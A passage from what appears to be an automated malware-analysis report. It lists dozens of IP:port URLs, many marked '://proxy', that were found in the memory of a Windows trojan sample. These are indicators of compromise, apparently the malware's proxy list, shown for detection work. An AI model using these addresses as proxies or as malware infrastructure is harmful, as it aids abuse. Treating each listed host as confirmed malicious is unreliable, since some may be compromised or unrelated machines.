                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.164.243.107:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.164.243.107:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.164.243.124:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.164.243.124:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.164.243.91:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.164.243.91:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.164.254.8:4216
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.164.254.8:4216://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC075000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.165.224.43:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.165.224.43:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8108000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.165.245.27:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8EA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.165.245.27:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.165.245.65:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.165.245.65:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.165.247.91:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.165.247.91:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.165.248.145:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.165.248.145:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAA25000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.166.170.73:41122
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.166.170.73:41122://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.179.187.16:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.179.187.16:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.215.23.242:9091
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.215.23.242:9091://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.234.215.11:8443
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.234.215.11:8443://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C902F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.234.85.26:9002
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.234.85.26:9002://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.56.243.209:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.56.243.209:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.62.58.37:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.62.58.37:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.78.143.137:29554
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.78.143.137:29554://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C63C5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.78.143.142:28134
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.78.143.142:28134://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C81D2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C796D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.87.160.62:82
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.87.160.62:82://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.140.227:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.140.227:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.184.48:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.184.48:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6577000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.193.26:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.193.26:8080://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.212.184:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.212.184:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.240.139:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.240.139:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.74.73:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.74.73:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.114.143:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.114.143:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.14.229:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.14.229:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.247.182:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.247.182:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.40.232:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.40.232:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.41.224:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.41.224:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.45.167:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.45.167:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C83E1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.91.80.194:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.91.80.194:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C83E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.96.235.105:18572
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C83E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.96.235.105:18572://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.169.154.119
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.169.154.119://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.169.154.119:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCE5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.170.245.148:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.170.245.148:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.170.248.5:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.170.248.5:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.11:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8347000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.11:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.13:15311
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.13:15311://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.14:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.14:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.17:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.17:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.18:15280
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.18:15280://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.23:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.23:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.25:15291
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBED6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.25:15291://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9496000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.26:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.26:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.28:15294
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C75CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.28:15294://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.3:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.3:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.5:15303
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.178.172.5:15303://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA8A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.181.217.194:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.181.217.194:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7749000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.181.217.201:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C773A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.181.217.201:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.181.217.210:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.181.217.210:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.181.217.213:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.181.217.213:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.181.217.220:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6C9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.181.217.220:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF41000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC15B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.185.105.105:4481
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.185.105.105:4481://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.185.2.12:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.185.2.12:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.22.4.109:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.22.4.109:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.60.66.122
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.60.66.122://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.60.66.122:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.72.36.89
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.72.36.89://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.72.36.89:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.82.130.44:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.82.130.44:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.95.220.42:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.95.220.42:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.101.16.52
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.101.16.52://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.104.112.62
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.104.112.62://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.104.112.62:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.104.63.106:3128
